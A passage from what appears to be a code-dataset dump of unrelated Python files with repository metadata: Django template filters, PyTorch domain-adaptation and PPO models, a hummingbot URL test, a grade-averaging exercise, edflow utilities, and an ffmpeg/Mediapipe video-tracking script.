t = Thesaurus.objects.filter(id=thesaurus_id)
if t.exists():
return Thesaurus.objects.get(id=thesaurus_id).about
@register.filter
def get_access_contraints_url(layer_id):
x = LayerRNDT.objects.filter(layer_id=layer_id)
if x.exists():
return x.get().constraints_other
return None
@register.filter
def get_access_contraints_keyword(layer_id):
x = LayerRNDT.objects.filter(layer_id=layer_id)
if x.exists():
url = x.get().constraints_other
keyword = ThesaurusKeyword.objects.filter(about=url)
if keyword.exists():
return ThesaurusKeyword.objects.get(about=url).alt_label
return None
@register.filter
def get_use_constraint_keyword(keyword_url):
t = ThesaurusKeyword.objects.filter(about=keyword_url)
if t.exists():
return ThesaurusKeyword.objects.get(about=keyword_url).alt_label
@register.filter
def is_url(item):
try:
validator = URLValidator()
validator(item)
return True
except:
return False
@register.filter
def get_spatial_resolution(layer_id):
resolution = LayerRNDT.objects.filter(layer_id=layer_id)
if resolution.exists():
return LayerRNDT.objects.get(layer_id=layer_id).resolution
@register.filter
def get_positional_accuracy(layer_id):
accuracy = LayerRNDT.objects.filter(layer_id=layer_id)
if accuracy.exists():
return LayerRNDT.objects.get(layer_id=layer_id).accuracy
| 27.285714 | 72 | 0.737056 | 222 | 1,719 | 5.518018 | 0.225225 | 0.091429 | 0.097143 | 0.097959 | 0.383673 | 0.383673 | 0.222041 | 0.222041 | 0.16 | 0.086531 | 0 | 0 | 0.169284 | 1,719 | 62 | 73 | 27.725806 | 0.857843 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.083333 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf7af33b2f34f609cedf99fe7194592e05e7a33f | 3,563 | py | Python | cycada/models/MDAN.py | Luodian/MADAN | 7a2918da44f5203b72652bc4cba0e70057482114 | [
"MIT"
] | 150 | 2019-10-29T01:22:31.000Z | 2022-02-16T02:09:31.000Z | cycada/models/MDAN.py | pikachusocute/MADAN | 7a2918da44f5203b72652bc4cba0e70057482114 | [
"MIT"
] | 6 | 2020-01-05T16:56:51.000Z | 2021-10-13T03:25:05.000Z | cycada/models/MDAN.py | pikachusocute/MADAN | 7a2918da44f5203b72652bc4cba0e70057482114 | [
"MIT"
] | 23 | 2019-11-04T15:46:29.000Z | 2022-01-16T09:10:01.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
logger = logging.getLogger(__name__)
class GradientReversalLayer(torch.autograd.Function):
"""
Implement the gradient reversal layer for the convenience of domain adaptation neural network.
The forward part is the identity function while the backward part is the negative function.
"""
def forward(self, inputs):
return inputs
def backward(self, grad_output):
grad_input = grad_output.clone()
grad_input = -grad_input
return grad_input
class MDANet(nn.Module):
"""
Multi-layer perceptron with adversarial regularizer by domain classification.
"""
def __init__(self, configs):
super(MDANet, self).__init__()
self.pooling_layer = nn.AdaptiveAvgPool2d((2, 2))
self.dim_reduction = nn.Conv2d(4096, 512, kernel_size=1)
nn.init.xavier_normal_(self.dim_reduction.weight)
nn.init.constant_(self.dim_reduction.bias, 0.1)
self.input_dim = configs["input_dim"]
self.num_hidden_layers = len(configs["hidden_layers"])
self.num_neurons = [] + [self.input_dim] + configs["hidden_layers"]
self.num_domains = configs["num_domains"]
# Parameters of hidden, fully-connected layers, feature learning component.
self.hiddens = nn.ModuleList([nn.Linear(self.num_neurons[i], self.num_neurons[i + 1])
for i in range(self.num_hidden_layers)])
# Parameter of the final softmax classification layer.
self.softmax = nn.Linear(self.num_neurons[-1], configs["num_classes"])
# Parameter of the domain classification layer, multiple sources single target domain adaptation.
self.domains = nn.ModuleList([nn.Linear(self.num_neurons[-1], 2) for _ in range(self.num_domains)])
# Gradient reversal layer.
self.grls = [GradientReversalLayer() for _ in range(self.num_domains)]
def forward(self, sinputs_syn, sinputs_gta, tinputs):
"""
:param sinputs: A list of k inputs from k source domains.
:param tinputs: Input from the target domain.
:return:
"""
sinputs_gta = self.pooling_layer(sinputs_gta)
sinputs_syn = self.pooling_layer(sinputs_syn)
tinputs = self.pooling_layer(tinputs)
sinputs_gta = self.dim_reduction(sinputs_gta)
sinputs_syn = self.dim_reduction(sinputs_syn)
tinputs = self.dim_reduction(tinputs)
b = sinputs_gta.size()[0]
syn_relu, gta_relu, th_relu = sinputs_syn.view(b, -1), sinputs_gta.view(b, -1), tinputs.view(b, -1)
assert (syn_relu[0].size()[0] == self.input_dim)
for hidden in self.hiddens:
syn_relu = F.relu(hidden(syn_relu))
gta_relu = F.relu(hidden(gta_relu))
for hidden in self.hiddens:
th_relu = F.relu(hidden(th_relu))
# Classification probabilities on k source domains.
logprobs = []
logprobs.append(F.log_softmax(self.softmax(syn_relu), dim=1))
logprobs.append(F.log_softmax(self.softmax(gta_relu), dim=1))
# Domain classification accuracies.
sdomains, tdomains = [], []
sdomains.append(F.log_softmax(self.domains[0](self.grls[0](syn_relu)), dim=1))
tdomains.append(F.log_softmax(self.domains[0](self.grls[0](th_relu)), dim=1))
sdomains.append(F.log_softmax(self.domains[1](self.grls[1](gta_relu)), dim=1))
tdomains.append(F.log_softmax(self.domains[1](self.grls[1](th_relu)), dim=1))
return logprobs, sdomains, tdomains
def inference(self, inputs):
h_relu = inputs
for hidden in self.hiddens:
h_relu = F.relu(hidden(h_relu))
# Classification probability.
logprobs = F.log_softmax(self.softmax(h_relu), dim=1)
return logprobs
| 35.277228 | 101 | 0.727196 | 518 | 3,563 | 4.820463 | 0.250965 | 0.028034 | 0.030837 | 0.04205 | 0.257909 | 0.164998 | 0.136163 | 0.073688 | 0.073688 | 0.073688 | 0 | 0.013175 | 0.147909 | 3,563 | 100 | 102 | 35.63 | 0.809289 | 0.221162 | 0 | 0.051724 | 0 | 0 | 0.020864 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 1 | 0.086207 | false | 0 | 0.068966 | 0.017241 | 0.258621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf7f1d14fd8adbed3cf841350eb294961b1fa9c9 | 776 | py | Python | test/hummingbot/connector/exchange/binance/test_binance_web_utils.py | pecuniafinance/hummingbot | 2cbb19c187a429d3e6000dc938617ca2a1f9f357 | [
"Apache-2.0"
] | 542 | 2021-12-17T22:34:31.000Z | 2022-03-31T14:36:23.000Z | test/hummingbot/connector/exchange/binance/test_binance_web_utils.py | pecuniafinance/hummingbot | 2cbb19c187a429d3e6000dc938617ca2a1f9f357 | [
"Apache-2.0"
] | 291 | 2021-12-17T20:07:53.000Z | 2022-03-31T11:07:23.000Z | test/hummingbot/connector/exchange/binance/test_binance_web_utils.py | pecuniafinance/hummingbot | 2cbb19c187a429d3e6000dc938617ca2a1f9f357 | [
"Apache-2.0"
] | 220 | 2021-12-17T12:41:23.000Z | 2022-03-31T23:03:22.000Z | import unittest
import hummingbot.connector.exchange.binance.binance_constants as CONSTANTS
from hummingbot.connector.exchange.binance import binance_web_utils as web_utils
class BinanceUtilTestCases(unittest.TestCase):
def test_public_rest_url(self):
path_url = "/TEST_PATH"
domain = "com"
expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PUBLIC_API_VERSION + path_url
self.assertEqual(expected_url, web_utils.public_rest_url(path_url, domain))
def test_private_rest_url(self):
path_url = "/TEST_PATH"
domain = "com"
expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PRIVATE_API_VERSION + path_url
self.assertEqual(expected_url, web_utils.private_rest_url(path_url, domain))
| 38.8 | 99 | 0.755155 | 101 | 776 | 5.465347 | 0.287129 | 0.076087 | 0.097826 | 0.123188 | 0.557971 | 0.485507 | 0.485507 | 0.485507 | 0.485507 | 0.485507 | 0 | 0 | 0.16366 | 776 | 19 | 100 | 40.842105 | 0.850539 | 0 | 0 | 0.285714 | 0 | 0 | 0.033505 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf7fc8a8b957b2b7bbdc53ff35693ae32e07145b | 1,915 | py | Python | stepik/python67/03_04_04.py | ornichola/learning-new | e567218d8887805e38b1361715d5e3bd51a6bcaf | [
"Unlicense"
] | 2 | 2019-05-24T20:10:16.000Z | 2020-07-11T06:06:43.000Z | stepik/python67/03_04_04.py | ornichola/learning-new | e567218d8887805e38b1361715d5e3bd51a6bcaf | [
"Unlicense"
] | null | null | null | stepik/python67/03_04_04.py | ornichola/learning-new | e567218d8887805e38b1361715d5e3bd51a6bcaf | [
"Unlicense"
] | 21 | 2019-03-11T20:25:05.000Z | 2022-02-28T13:53:10.000Z | #[STEPIK]
# Программирование на Python https://stepik.org/67
# 03_04_04 Файловый ввод/вывод
'''
Имеется файл с данными по успеваемости абитуриентов. Он представляет из себя набор строк, где в каждой строке записана следующая информация:
Фамилия;Оценка_по_математике;Оценка_по_физике;Оценка_по_русскому_языку
Поля внутри строки разделены точкой с запятой, оценки — целые числа.
Напишите программу, которая считывает файл с подобной структурой и для каждого абитуриента выводит его среднюю оценку по этим трём предметам на отдельной строке, соответствующей этому абитуриенту.
Также в конце файла, на отдельной строке, через пробел запишите средние баллы по математике, физике и русскому языку по всем абитуриентам:
Примечание. Для разбиения строки на части по символу ';' можно использовать метод split следующим образом:
print('First;Second-1 Second-2;Third'.split(';'))
# ['First', 'Second-1 Second-2', 'Third']
Sample Input:
Петров;85;92;78
Сидоров;100;88;94
Иванов;58;72;85
Sample Output:
85.0
94.0
71.666666667
81.0 84.0 85.666666667
'''
averages = []
marks_math = []
marks_phys = []
marks_rus = []
counter = 0
value01 = 0
value02 = 0
value03 = 0
with open('03_04_04_input.txt') as in_f_obj:
for line in in_f_obj:
line = line.rstrip().split(';')
student_average = ((int(line[1]) + int(line[2]) + int(line[3])) / 3)
averages.append(student_average)
marks_math.append(int(line[1]))
marks_phys.append(int(line[2]))
marks_rus.append(int(line[3]))
counter += 1
with open('03_04_04_output.txt', 'w') as out_f_obj:
for _ in averages:
out_f_obj.write(str(_) + '\n')
for _ in marks_math:
value01 += int(_)
for _ in marks_phys:
value02 += int(_)
for _ in marks_rus:
value03 += int(_)
average_math = value01 / counter
average_phys = value02 / counter
average_rus = value03 / counter
out_f_obj.write(str(average_math) + ' ' + str(average_phys) + ' ' + str(average_rus)) | 28.58209 | 196 | 0.734726 | 295 | 1,915 | 4.60339 | 0.484746 | 0.030928 | 0.013255 | 0.02651 | 0.078056 | 0.035346 | 0 | 0 | 0 | 0 | 0 | 0.065846 | 0.151436 | 1,915 | 67 | 197 | 28.58209 | 0.769231 | 0.54047 | 0 | 0 | 0 | 0 | 0.049369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf80a6ed202974e61e0995b343b524e3bec0665a | 1,921 | py | Python | baselines/PPO/src/model.py | dg10mcdos/mario-bmstew | 5b1806fc59dc88fd326a4e1de9c02284ba35f9f9 | [
"BSD-3-Clause"
] | null | null | null | baselines/PPO/src/model.py | dg10mcdos/mario-bmstew | 5b1806fc59dc88fd326a4e1de9c02284ba35f9f9 | [
"BSD-3-Clause"
] | null | null | null | baselines/PPO/src/model.py | dg10mcdos/mario-bmstew | 5b1806fc59dc88fd326a4e1de9c02284ba35f9f9 | [
"BSD-3-Clause"
] | null | null | null | """
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import torch.nn as nn
import torch.nn.functional as F
class PPO(nn.Module):
def __init__(self, num_inputs, num_actions): # num_states, num_actions (e.g. 4 & 7)
super(PPO, self).__init__()
self.conv1 = nn.Conv2d(num_inputs, 32, 3, stride=2, padding=1) # input 4 states channels, output channels
self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.linear = nn.Linear(32 * 6 * 6, 512)
self.critic_linear = nn.Linear(512, 1)
self.actor_linear = nn.Linear(512, num_actions)
self._initialize_weights()
def _initialize_weights(self):
for module in self.modules():
if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):
nn.init.orthogonal_(module.weight, nn.init.calculate_gain('relu'))
# nn.init.xavier_uniform_(module.weight)
# nn.init.kaiming_uniform_(module.weight)
nn.init.constant_(module.bias, 0)
def forward(self, x): # x = curr_states, relu is activation function, if relu +ve, output the input x is 4,4,84,84
# x [4,4,84,84]
x = F.relu(self.conv1(x)) # input states, 32 output filters, convolution 3x3
# x [4,32,42,42]
x = F.relu(self.conv2(x)) # 32 input filters, 32 output filters. filters will learn to recognise "objects" in environment
# x [4, 32, 21, 21]
x = F.relu(self.conv3(x)) #
# x [4,32,11,11]
x = F.relu(self.conv4(x)) # x is 4, 32, 6, 6
# x [4, 32, 6, 6]
# x.view(x.size(0),-1) [4, 32 * 6 * 6] - [4,1152]
x = self.linear(x.view(x.size(0), -1))
# x [4, 512]
# actor [4, 7] critic [4, 1]
return self.actor_linear(x), self.critic_linear(x)
| 42.688889 | 129 | 0.5924 | 302 | 1,921 | 3.668874 | 0.298013 | 0.01083 | 0.032491 | 0.036101 | 0.192238 | 0.124549 | 0.086643 | 0.086643 | 0.086643 | 0.086643 | 0 | 0.094233 | 0.259761 | 1,921 | 44 | 130 | 43.659091 | 0.684951 | 0.320666 | 0 | 0 | 0 | 0 | 0.003123 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.08 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf815a5689f21b9f61269d3af287f2332400836a | 2,423 | py | Python | ufdl-core-app/src/ufdl/core_app/views/mixins/_GetHardwareGenerationViewSet.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/views/mixins/_GetHardwareGenerationViewSet.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/views/mixins/_GetHardwareGenerationViewSet.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from typing import List, NoReturn
from rest_framework import routers
from rest_framework.request import Request
from rest_framework.response import Response
from ...exceptions import BadArgumentValue
from ...models.nodes import Hardware
from ...serialisers.nodes import HardwareSerialiser
from ._RoutedViewSet import RoutedViewSet
class GetHardwareGenerationViewSet(RoutedViewSet):
"""
Mixin for the hardware view-set which adds the ability to
get the name of a hardware generation from the compute
capability.
"""
# The keyword used to specify when the view-set is in get-hardware-generation mode
MODE_KEYWORD: str = "get-hardware-generation"
@classmethod
def get_routes(cls) -> List[routers.Route]:
return [
routers.Route(
url=r'^{prefix}/get-hardware-generation/(?P<compute>.+){trailing_slash}$',
mapping={'get': 'get_hardware_generation'},
name='{basename}-get-hardware-generation',
detail=False,
initkwargs={cls.MODE_ARGUMENT_NAME: GetHardwareGenerationViewSet.MODE_KEYWORD}
)
]
def get_hardware_generation(self, request: Request, compute=None):
"""
Action to get the hardware generation for a given level
of compute capability.
:param request: The request.
:param compute: The level of compute capability.
:return: The response containing the job.
"""
# Attempt to parse the compute level
try:
capability = float(compute)
except ValueError:
self._bad_argument(compute)
# Get the hardware generation that corresponds to the compute level
generation = Hardware.objects.for_compute_capability(capability)
# If none do, raise an error
if generation is None:
self._bad_argument(compute)
return Response(HardwareSerialiser().to_representation(generation))
def _bad_argument(self, compute: str) -> NoReturn:
"""
Handles the case when the compute value is not valid.
:param compute: The compute value.
"""
# Get the allowed range of compute values
min, max = Hardware.objects.get_full_compute_range()
# Raise a bad-argument error
raise BadArgumentValue(self.action, "compute", compute, f"[{min}, {max})")
| 35.115942 | 94 | 0.658275 | 270 | 2,423 | 5.811111 | 0.362963 | 0.10325 | 0.080306 | 0.030593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.262897 | 2,423 | 68 | 95 | 35.632353 | 0.878499 | 0.294676 | 0 | 0.060606 | 0 | 0 | 0.10665 | 0.091593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.242424 | 0.030303 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf82e91afdcb5e0fddbe0747375ddf3b811c5754 | 10,575 | py | Python | edflow/util.py | rromb/edflow | 8681cadf1770ca1bc1515535768dc14cb0758b0f | [
"MIT"
] | 2 | 2021-03-10T13:42:12.000Z | 2021-03-10T14:29:53.000Z | edflow/util.py | rromb/edflow | 8681cadf1770ca1bc1515535768dc14cb0758b0f | [
"MIT"
] | null | null | null | edflow/util.py | rromb/edflow | 8681cadf1770ca1bc1515535768dc14cb0758b0f | [
"MIT"
] | null | null | null | """Some Utility functions, that make yur life easier but don't fit in any
better catorgory than util."""
import numpy as np
import os
import pickle
def linear_var(step, start, end, start_value, end_value, clip_min=0.0, clip_max=1.0):
r"""Linear from :math:`(a, \alpha)` to :math:`(b, \beta)`, i.e.
:math:`y = (\beta - \alpha)/(b - a) * (x - a) + \alpha`
Args:
step (float): :math:`x`
start: :math:`a`
end: :math:`b`
start_value: :math:`\alpha`
end_value: :math:`\beta`
clip_min: Minimal value returned.
clip_max: Maximum value returned.
Returns:
float: :math:`y`
"""
linear = (end_value - start_value) / (end - start) * (
float(step) - start
) + start_value
return float(np.clip(linear, clip_min, clip_max))
def walk(dict_or_list, fn, inplace=False, pass_key=False, prev_key=""): # noqa
"""Walk a nested list and/or dict recursively and call fn on all non
list or dict objects.
Example:
.. codeblock:: python
dol = {'a': [1, 2], 'b': {'c': 3, 'd': 4}}
def fn(val):
return val**2
result = walk(dol, fn)
print(result) # {'a': [1, 4], 'b': {'c': 9, 'd': 16}}
print(dol) # {'a': [1, 2], 'b': {'c': 3, 'd': 4}}
result = walk(dol, fn, inplace=True)
print(result) # {'a': [1, 4], 'b': {'c': 9, 'd': 16}}
print(dol) # {'a': [1, 4], 'b': {'c': 9, 'd': 16}}
Args:
dict_or_list (dict or list): Possibly nested list or dictionary.
fn (Callable): Applied to each leave of the nested list_dict-object.
inplace (bool): If False, a new object with the same structure
and the results of fn at the leaves is created. If True the leaves
are replaced by the results of fn.
pass_key (bool): Also passes the key or index of the leave element to
``fn``.
prev_key (str): If ``pass_key == True`` keys of parent nodes are passed
to calls of ``walk`` on child nodes to accumulate the keys.
Returns:
dict or list: The resulting nested list-dict-object with the results of
fn at its leaves.
"""
if not pass_key:
def call(value):
if isinstance(value, (list, dict)):
return walk(value, fn, inplace)
else:
return fn(value)
else:
def call(key, value):
key = os.path.join(prev_key, key)
if isinstance(value, (list, dict)):
return walk(value, fn, inplace, pass_key=True, prev_key=key)
else:
return fn(key, value)
if isinstance(dict_or_list, list):
results = []
for i, val in strenumerate(dict_or_list):
result = call(i, val) if pass_key else call(val)
results += [result]
if inplace:
dict_or_list[int(i)] = result
elif isinstance(dict_or_list, dict):
results = {}
for key, val in dict_or_list.items():
result = call(key, val) if pass_key else call(val)
results[key] = result
if inplace:
dict_or_list[key] = result
else:
if not inplace:
if not pass_key:
results = fn(dict_or_list)
else:
results = fn(prev_key, dict_or_list)
else:
if not pass_key:
dict_or_list = fn(dict_or_list)
else:
dict_or_list = fn(prev_key, dict_or_list)
if inplace:
results = dict_or_list
return results
def retrieve(key, list_or_dict, splitval="/"):
"""Given a nested list or dict return the desired value at key.
Args:
key (str): key/to/value, path like string describing all keys
necessary to consider to get to the desired value. List indices
can also be passed here.
list_or_dict (list or dict): Possibly nested list or dictionary.
splitval (str): String that defines the delimiter between keys of the
different depth levels in `key`.
Returns:
The desired value :)
"""
keys = key.split(splitval)
try:
visited = []
for key in keys:
if isinstance(list_or_dict, dict):
list_or_dict = list_or_dict[key]
else:
list_or_dict = list_or_dict[int(key)]
visited += [key]
except Exception as e:
print("Key not found: {}, seen: {}".format(keys, visited))
raise e
return list_or_dict
def contains_key(nested_thing, key, splitval="/"):
"""Tests if the path like key can find an object in the nested_thing.
Has the same signature as :function:`retrieve`."""
try:
retrieve(nested_thing, key, splitval)
return True
except Exception:
return False
def strenumerate(iterable):
"""Works just as enumerate, but the returned index is a string.
Args:
iterable (Iterable): An (guess what) iterable object.
"""
for i, val in enumerate(iterable):
yield str(i), val
def cached_function(fn):
"""a very rough cache for function calls. Highly experimental. Only
active if activated with environment variable."""
# secret activation code
if not os.environ.get("EDFLOW_CACHED_FUNC", 0) == "42":
return fn
cache_dir = os.path.join(os.environ.get("HOME"), "var", "edflow_cached_func")
os.makedirs(cache_dir, exist_ok=True)
def wrapped(*args, **kwargs):
fnhash = fn.__name__
callargs = (args, kwargs)
callhash = str(len(pickle.dumps(callargs)))
fullhash = fnhash + callhash
pfname = fullhash + ".p"
ppath = os.path.join(cache_dir, pfname)
if not os.path.exists(ppath):
# compute
print("Computing {}".format(ppath))
result = fn(*args, **kwargs)
# and cache
with open(ppath, "wb") as f:
pickle.dump(result, f)
print("Cached {}".format(ppath))
else:
# load from cache
with open(ppath, "rb") as f:
result = pickle.load(f)
return result
return wrapped
class PRNGMixin(object):
"""Adds a prng property which is a numpy RandomState which gets
reinitialized whenever the pid changes to avoid synchronized sampling
behavior when used in conjunction with multiprocessing."""
@property
def prng(self):
currentpid = os.getpid()
if getattr(self, "_initpid", None) != currentpid:
self._initpid = currentpid
self._prng = np.random.RandomState()
return self._prng
class Printer(object):
"""For usage with walk: collects strings for printing"""
def __init__(self, string_fn):
self.str = ""
self.string_fn = string_fn
def __call__(self, key, obj):
self.str += self.string_fn(key, obj) + "\n"
def __str__(self):
return self.str
class TablePrinter(object):
"""For usage with walk: Collects string to put in a table."""
def __init__(self, string_fn, names=None):
if names is None:
self.vals = []
self.has_header = False
else:
self.vals = [names]
self.has_header = True
self.string_fn = string_fn
def __call__(self, key, obj):
self.vals += [list(self.string_fn(key, obj))]
def __str__(self):
# get width of table:
col_widths = [0] * len(self.vals[0])
for val in self.vals:
for i, entry in enumerate(val):
col_widths[i] = max(col_widths[i], len(entry) + 2)
form = "|"
for cw in col_widths:
form += " {: >" + str(cw) + "} |"
form += "\n"
ref_line = form.format(*self.vals[0])
sep = "-" * (len(ref_line) - 1)
hsep = "=" * (len(ref_line) - 1)
chars = np.array(list(ref_line))
crossings = np.where(chars == "|")[0]
print(crossings)
for c in crossings:
sep = sep[:c] + "+" + sep[c + 1 :]
hsep = hsep[:c] + "+" + hsep[c + 1 :]
sep += "\n"
hsep += "\n"
table_str = sep
for i, val in enumerate(self.vals):
table_str += form.format(*val)
if self.has_header and i == 0:
table_str += hsep
else:
table_str += sep
return table_str
def pprint_str(nested_thing, heuristics=None):
"""Formats nested objects as string and tries to give relevant information.
Args:
nested_thing (dict or list): Some nested object.
heuristics (Callable): If given this should produce the string, which
is printed as description of a leaf object.
"""
if heuristics is None:
def heuristics(key, obj):
if isinstance(obj, np.ndarray):
return "{}: np array - {}".format(key, obj.shape)
else:
return "{}: {} - {}".format(key, type(obj), obj)
P = Printer(heuristics)
walk(nested_thing, P, pass_key=True)
return str(P)
def pprint(nested_thing, heuristics=None):
"""Prints nested objects and tries to give relevant information.
Args:
nested_thing (dict or list): Some nested object.
heuristics (Callable): If given this should produce the string, which
is printed as description of a leaf object.
"""
print(pprint_str(nested_thing, heuristics))
def pp2mkdtable(nested_thing):
"""Turns a formatted string into a markdown table."""
def heuristics(key, obj):
if hasattr(obj, "shape"):
s = str(obj) if obj.shape == () else str(obj.shape)
return key, str(obj.__class__.__name__), s
elif hasattr(obj, "size"):
return key, str(obj.__class__.__name__), str(obj.size())
else:
return key, str(obj.__class__.__name__), str(obj)
P = TablePrinter(heuristics, names=["Name", "Type", "Content"])
walk(nested_thing, P, pass_key=True)
return str(P)
if __name__ == "__main__":
from edflow.data.util import plot_datum
image = np.ones([100, 100, 3])
nested = {
"step": 1,
"stuff": {"a": 1, "b": [1, 2, 3]},
"more": [{"c": 1}, 2, [3, 4]],
"image": image,
}
def fn(val):
print(val)
return -val
new = walk(nested, fn)
print(nested)
print(new)
pprint(nested)
print(pp2mkdtable(nested))
plot_datum(nested)
| 29.212707 | 85 | 0.564728 | 1,389 | 10,575 | 4.161987 | 0.226062 | 0.01972 | 0.032866 | 0.009687 | 0.236291 | 0.17644 | 0.136309 | 0.136309 | 0.11434 | 0.111399 | 0 | 0.008144 | 0.314894 | 10,575 | 361 | 86 | 29.293629 | 0.789786 | 0.317069 | 0 | 0.180412 | 0 | 0 | 0.030792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113402 | false | 0.046392 | 0.020619 | 0.005155 | 0.268041 | 0.061856 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf84b8c96e2bdd65eb5bb3c0dbead6d4d0544cd5 | 2,459 | py | Python | src/Examples/Akihabara.Examples.OnRawIO/track.py | Amberarch/Akihabara | 22d3984cb225e199b955e6b13be90f1959978bc6 | [
"MIT"
] | 19 | 2021-09-13T21:29:58.000Z | 2022-03-01T13:44:23.000Z | src/Examples/Akihabara.Examples.OnRawIO/track.py | Amberarch/Akihabara | 22d3984cb225e199b955e6b13be90f1959978bc6 | [
"MIT"
] | 44 | 2021-09-13T15:27:46.000Z | 2022-01-18T13:13:09.000Z | src/Examples/Akihabara.Examples.OnRawIO/track.py | Amberarch/Akihabara | 22d3984cb225e199b955e6b13be90f1959978bc6 | [
"MIT"
] | 10 | 2021-09-15T16:15:46.000Z | 2022-01-21T01:14:54.000Z | #!/usr/bin/python
import argparse
import subprocess
class MediaMetadata:
def __init__(self, width, height, framerate):
self.width = width
self.height = height
self.framerate = framerate
def from_filepath(filepath):
output = subprocess.check_output([
"ffprobe", "-v", "0",
"-select_streams", "v:0",
"-show_entries", "stream=width,height,r_frame_rate",
"-of", "default=noprint_wrappers=1", filepath
]).decode('ascii').splitlines()
[warr, harr, farr] = [l.split('=')[1] for l in output]
width = int(warr)
height = int(harr)
[nfarr, dfarr] = farr.split('/')
framerate = int(nfarr) / int(dfarr)
return MediaMetadata(width, height, framerate)
parser = argparse.ArgumentParser(
prog='track.py',
description='Pipe a video or image into Mediapipe to track something.',
epilog='Dame da ne, dame yo, dame na no yo...')
parser.add_argument('media',
help='The media to feed into a Medapipe graph.')
parser.add_argument('-g', '--graph',
default='mediapipe/graphs/face_mesh/face_mesh_desktop_live.pbtxt',
help='The Mediapipe graph to feed some media to.')
parser.add_argument('-o', '--output',
default='bin/video-out.mp4',
help='Where to put the output file.')
args = parser.parse_args()
mm = MediaMetadata.from_filepath(args.media)
# ffmpeg -hide_banner -an -i $video_in -pix_fmt rgba -f rawvideo - 2>/dev/null \
# | bin/Debug/net5.0/Akihabara.Examples.OnRawIO $sw $sh mediapipe/graphs/face_mesh/face_mesh_desktop_live.pbtxt \
# | ffmpeg -vn -i $video_in -y -hide_banner -pix_fmt rgba -f rawvideo -s ${sw}x${sh} -r $fps -i - -pix_fmt yuv420p $video_out
p_decode = subprocess.Popen([
"ffmpeg", "-hide_banner",
"-an", "-i", args.media,
"-pix_fmt", "rgba", "-f", "rawvideo", "-"
], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
p_track = subprocess.Popen([
"bin/Debug/net5.0/Akihabara.Examples.OnRawIO",
str(mm.width), str(mm.height), args.graph
], stdin=p_decode.stdout, stdout=subprocess.PIPE)
p_decode.stdout.close()
p_encode = subprocess.Popen([
"ffmpeg", "-hide_banner", "-y",
"-vn", "-i", args.media,
"-pix_fmt", "rgba", "-f", "rawvideo", "-s", f"{mm.width}x{mm.height}", "-r", str(mm.framerate), "-i", "-",
